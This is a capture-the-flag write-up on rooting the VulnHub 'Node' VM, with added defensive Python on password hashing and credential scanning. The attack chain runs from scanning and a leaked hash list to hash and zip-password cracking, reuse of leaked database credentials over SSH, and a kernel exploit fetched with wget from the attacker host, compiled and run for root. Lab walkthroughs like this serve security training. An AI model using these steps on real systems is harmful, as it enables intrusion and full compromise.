Node target machine (VulnHub)

Target download: https://www.vulnhub.com/entry/node-1,252/

The target is the Node virtual machine imported into VMware, with host-only networking; its IP address is assigned by DHCP.

Host discovery

[root@kali ~]# arp-scan -I eth0 -l

Port scanning

[root@kali ~]# nmap -sS -p1-65535 -v 192.168.64.129
PORT     STATE SERVICE
22/tcp   open  ssh
3000/tcp open  ppp

Service identification

[root@kali ~]# nmap -sV -T4 -p22,3000 192.168.64.129

[image: port_service]

Finding vulnerabilities

Directory scanning

[root@kali ~]# dirb http://192.168.64.129:3000 ~/web_file_list.txt

[image: scan_web_file]

No web directories were found.

Probing with Burp Suite

Burp captured user data in JSON format at http://192.168.64.129:3000/api/users/latest

[image: api_user]

Dropping latest and requesting http://192.168.64.129:3000/api/users/ revealed the administrator account.

[image: user_admin]

Cracking the password

[root@kali ~]# hash-identifier dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af
Possible Hashs:
[+] SHA-256
[+] Haval-256

Least Possible Hashs:
[+] GOST R 34.11-94
[+] RipeMD-256
[+] SNEFRU-256
[+] SHA-256(HMAC)
[+] Haval-256(HMAC)
[+] RipeMD-256(HMAC)
[+] SNEFRU-256(HMAC)
[+] SHA-256(md5($pass))
[+] SHA-256(sha1($pass))

SHA-256 online lookup: https://md5decrypt.net/Sha256/

[image: online_decrypter]
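To make concrete why an unauthenticated user listing that includes password hashes is the real finding here, the following is an added Python example; it is not part of the original walkthrough and not the target application's code. It works on constructed user records with placeholder passwords, reproduces the length-based guess that hash-identifier makes (which is why it cannot tell SHA-256 from Haval-256), shows how a wordlist lookup table of the kind the online service uses matches unsalted SHA-256 digests, and contrasts that with the response the API should have served and with a salted PBKDF2 hash that no precomputed table can match. The digest passed to digest_bits is the one from the listing above; everything else (user names, plaintexts, field names) is assumed for the demo.

```python
import hashlib
import hmac
import os


def sha256_hex(s: str) -> str:
    """Unsalted SHA-256 of a string, as the target stored its passwords."""
    return hashlib.sha256(s.encode()).hexdigest()


# Constructed records in the shape a /api/users/ listing might return.
# The plaintexts are placeholders chosen for this demo, not real credentials.
SAMPLE_USERS = [
    {"_id": "u1", "username": "alice", "password": sha256_hex("password123"), "is_admin": False},
    {"_id": "u2", "username": "siteadmin", "password": sha256_hex("letmein"), "is_admin": True},
]


def digest_bits(hex_digest: str) -> int:
    """What hash-identifier effectively does: infer the digest size from its length.
    64 hex chars -> 256 bits, which fits SHA-256 but equally Haval-256 or RIPEMD-256."""
    int(hex_digest, 16)  # raises ValueError if this is not a hex string
    return len(hex_digest) * 4


def public_view(users):
    """The response the endpoint should have produced: no hashes, no internal ids."""
    return [{k: v for k, v in u.items() if k not in ("password", "_id")} for u in users]


def find_dictionary_hits(users, wordlist):
    """Mimic an online lookup service: hash every word once, then match each record.
    Fast unsalted hashes make this a single dictionary lookup per user."""
    table = {sha256_hex(w): w for w in wordlist}
    return {u["username"]: table[u["password"]] for u in users if u["password"] in table}


def hash_password(password: str, salt: bytes = None, iterations: int = 200_000) -> str:
    """Salted, slow hash: a fresh 16-byte salt per password defeats precomputed tables."""
    salt = salt or os.urandom(16)
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), salt, iterations)
    return f"pbkdf2_sha256${iterations}${salt.hex()}${dk.hex()}"


def verify_password(password: str, stored: str) -> bool:
    """Recompute with the stored salt and compare in constant time."""
    algo, iters, salt_hex, dk_hex = stored.split("$")
    if algo != "pbkdf2_sha256":
        return False
    dk = hashlib.pbkdf2_hmac("sha256", password.encode(), bytes.fromhex(salt_hex), int(iters))
    return hmac.compare_digest(dk.hex(), dk_hex)


if __name__ == "__main__":
    # The digest shown in the user listing above: length alone says "256-bit".
    print("digest bits:", digest_bits("dffc504aa55359b9265cbebe1e4032fe600b64475ae3fd29c07d23223334d0af"))
    print("dictionary hits:", find_dictionary_hits(SAMPLE_USERS, ["qwerty", "letmein", "password123"]))
    print("safe API view:", public_view(SAMPLE_USERS))
    stored = hash_password("letmein")
    print("pbkdf2 record:", stored)
    print("verify ok:", verify_password("letmein", stored))
    # A salted record never appears in a sha256 lookup table, even for the same plaintext.
    print("lookup against salted record:", find_dictionary_hits([{"username": "siteadmin", "password": stored}], ["letmein"]))
```

The two fixes the example implies are independent: strip credential fields from every API response, and store passwords with a salted, iterated hash so that a leaked record is not reversible with a wordlist table even when a listing does get out.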

Logging in as the administrator

After logging in as the administrator, a backup file can be downloaded.

[image: down_bak]

Decoding the backup

The file is ASCII text; a preview suggests it is Base64-encoded.

[root@kali ~]# file myplace.backup
myplace.backup: ASCII text, with very long lines, with no line terminators

Base64-decoding it yields a zip archive, but extracting it requires a password.

[root@kali ~]# cat myplace.backup | base64 -d > myplace.bak
[root@kali ~]# file myplace.bak
myplace.bak: Zip archive data, at least v1.0 to extract

Cracking the zip password

[root@kali ~]# fcrackzip -v -b -u -c a -p magicaaaa myplace.bak
... ...
PASSWORD FOUND!!!!: pw == magicword

Looking for usable information after extraction

[root@kali ~]# unzip myplace.bak
[root@kali ~]# more var/www/myplace/app.js
... ...
const url = 'mongodb://mark:5AYRft73VtFpc84k@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';
... ...
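The backup triage above (file says ASCII text, Base64 decode gives a zip, unzip wants a password, app.js holds a connection string with an embedded password) is a repeatable pattern, so here is an added Python example that automates it; it is not from the original walkthrough. The backup it works on is constructed inside the block: a small zip with an app.js whose connection string carries the placeholder password EXAMPLEpass, Base64-encoded the way myplace.backup was. The block tests for Base64, decodes, identifies the archive from its magic bytes, reads the zip encryption flag that made unzip prompt, and scans text members for user:password@host URLs, redacting the secret in the report. The sample archive is unencrypted so the whole pipeline runs offline; member paths and the URL are assumptions for the demo.

```python
import base64
import io
import re
import zipfile


def _build_sample_backup() -> bytes:
    """Constructed stand-in for myplace.backup: zip -> Base64, no password."""
    app_js = (
        b"const express = require('express');\n"
        b"// placeholder credentials for the demo, not the target's real ones\n"
        b"const url = 'mongodb://mark:EXAMPLEpass@localhost:27017/myplace?authMechanism=DEFAULT&authSource=myplace';\n"
        b"const PORT = 3000;\n"
    )
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("var/www/myplace/app.js", app_js)
        zf.writestr("var/www/myplace/static/index.html", b"<html></html>\n")
    return base64.b64encode(buf.getvalue())


SAMPLE_BACKUP = _build_sample_backup()


def looks_base64(data: bytes) -> bool:
    """Cheap check behind file's 'ASCII text, very long lines' hint: alphabet and padding."""
    s = data.strip()
    return len(s) % 4 == 0 and re.fullmatch(rb"[A-Za-z0-9+/]+={0,2}", s) is not None


def decode_backup(data: bytes) -> bytes:
    return base64.b64decode(data.strip(), validate=True)


# Magic bytes for the container types a backup is likely to be.
MAGIC = [(b"PK\x03\x04", "zip"), (b"\x1f\x8b", "gzip"), (b"BZh", "bzip2"), (b"\x7fELF", "elf")]


def classify(blob: bytes) -> str:
    """Identify the decoded blob the way file(1) does, by its leading bytes."""
    for sig, name in MAGIC:
        if blob.startswith(sig):
            return name
    return "unknown"


def is_encrypted_zip(blob: bytes) -> bool:
    """Bit 0 of a member's general-purpose flag marks it as password-protected."""
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        return any(info.flag_bits & 0x1 for info in zf.infolist())


# scheme://user:password@host[:port] inside source or config text.
CRED_URL = re.compile(r"\b([a-z][a-z0-9+.-]*)://([^:/\s'\"@]+):([^@\s'\"]+)@([^/\s'\"]+)")


def find_credentials(blob: bytes, pwd=None):
    """Scan every file in the archive for URLs with embedded credentials.
    Returns (member, scheme, user, host) tuples; the password itself is not returned."""
    hits = []
    with zipfile.ZipFile(io.BytesIO(blob)) as zf:
        for info in zf.infolist():
            if info.is_dir():
                continue
            text = zf.read(info.filename, pwd=pwd).decode("utf-8", errors="replace")
            for m in CRED_URL.finditer(text):
                hits.append((info.filename, m.group(1), m.group(2), m.group(4)))
    return hits


def redact(text: str) -> str:
    """Mask the password part of any credential URL before logging or reporting."""
    return CRED_URL.sub(r"\1://\2:***@\4", text)


if __name__ == "__main__":
    raw = SAMPLE_BACKUP
    print("looks like base64:", looks_base64(raw))
    blob = decode_backup(raw)
    print("container:", classify(blob), "| encrypted zip:", is_encrypted_zip(blob))
    for member, scheme, user, host in find_credentials(blob):
        print(f"{member}: {scheme} credential for user '{user}' at {host}")
    print(redact("mongodb://mark:EXAMPLEpass@localhost:27017/myplace"))
```

For a password-protected archive, pass the recovered password as pwd=b"..." to find_credentials; zipfile reads ZipCrypto members but cannot write them, which is why the constructed sample is left unencrypted. The defensive lesson is the same one the walkthrough demonstrates by hand: a downloadable backup that contains application source with database credentials is a credential leak regardless of the zip password, so connection strings belong in environment variables or a secrets store, not in app.js.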

Trying the MongoDB user's credentials over SSH

[root@kali ~]# ssh mark@192.168.64.129    # password: 5AYRft73VtFpc84k
[mark@node ~]$ uname -a
Linux node 4.4.0-93-generic #116-Ubuntu SMP Fri Aug 11 21:17:51 UTC 2017 x86_64 x86_64 x86_64 GNU/Linux
[mark@node ~]$ cat /etc/issue
Ubuntu 16.04.3 LTS \n \l

Privilege escalation via a kernel vulnerability

[root@kali ~]# searchsploit Ubuntu 16.04

A local privilege escalation exploit is listed.

[image: ubuntu_sploit]

Transfer the exploit code to the target

[root@kali ~]# systemctl start apache2.service
[root@kali ~]# cp /usr/share/exploitdb/exploits/linux/local/44298.c /var/www/html/
[mark@node /tmp]$ wget http://192.168.64.128/44298.c
# 192.168.64.128 is the Kali VM's IP
[mark@node /tmp]$ gcc 44298.c -o exp
[mark@node /tmp]$ ./exp
[root@node /tmp]# whoami
root